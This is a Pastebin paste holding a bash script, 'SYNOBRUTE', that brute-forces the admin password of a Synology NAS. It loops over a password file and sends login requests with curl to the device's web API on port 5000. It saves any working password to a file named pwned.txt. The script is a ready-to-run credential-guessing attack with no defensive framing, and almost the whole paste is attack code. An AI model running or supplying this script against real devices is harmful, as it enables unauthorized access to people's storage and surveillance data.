Guest User

brute force synology

a guest
Jul 29th, 2019
373
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. echo "███████╗██╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗"
  3. echo "██╔════╝╚██╗ ██╔╝████╗ ██║██╔═══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝"
  4. echo "███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗ "
  5. echo "╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ "
  6. echo "███████║ ██║ ██║ ╚████║╚██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗"
  7. echo "╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝"
  8. echo " "
  9. echo "SYNOBRUTE - evolutio - 2018"
  10.  
  11. date
  12. echo ""
  13. echo " ./bruteforce.sh password.txt 192.168.1.101"
  14. echo ""
  15. cat $1 | while read output
  16. do
  17. [[ -z "$1" ]] && { echo "Parameter 1 is empty - fichier.txt " ; exit 1; }
  18. [[ -z "$2" ]] && { echo "Parameter 2 is empty - ip_adress_nas " ; exit 1; }
  19. echo "tentative avec le mot de passe $output sur $2"
  20. syno_user="admin"
  21. syno_pwd=$output
  22. syno_url=$2 # eg 192.168.1.100
  23. vAuth=2
  24. touch pwned.txt
  25. # Get Paths (recommended by Synology for further update)
  26. curlResult=$(curl -s "http://${syno_url}:5000/webapi/query.cgi?api=SYNO.API.Info&method=Query&version=1&query=SYNO.API.Auth,SYNO.SurveillanceStation.Camera")
  27. authPath=$(echo "$curlResult" | jq -r '.["data"]["SYNO.API.Auth"]["path"]')
  28. # login
  29. curlResult=$(curl -s "http://${syno_url}:5000/webapi/${authPath}?api=SYNO.API.Auth&method=Login&version=${vAuth}&account=${syno_user}&passwd=${syno_pwd}&session=SurveillanceStation&format=sid")
  30. if [[ $(echo "$curlResult" | jq -r '.["success"]') == 'true' ]]; then
  31. echo -e "\033[32m ----------------------------------- \033[0m"
  32. echo -e "\033[32m succes login for $syno_url \033[0m"
  33. echo -e "\033[32m ----------------------------------- \033[0m"
  34. echo ""
  35. echo "login is admin $output" >> pwned.txt
  36. exit 0
  37. fi
  38. if [[ $(echo "$curlResult" | jq -r '.["success"]') == 'false' ]]; then
  39. echo -e "\033[31mError on login : bad password !!! \033[0m"
  40. echo ""
  41. else
  42. echo -e "\033[31mError on login \033[0m"
  43. echo ""
  44. fi
  45. SID=$(echo "$curlResult" | jq -r '.["data"]["sid"]')
  46. curl -s "http://${syno_url}:5000/webapi/${authPath}?api=SYNO.API.Auth&method=Logout&version=${vAuth}&_sid=${SID}" > /dev/null 2>&1
  47. done
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×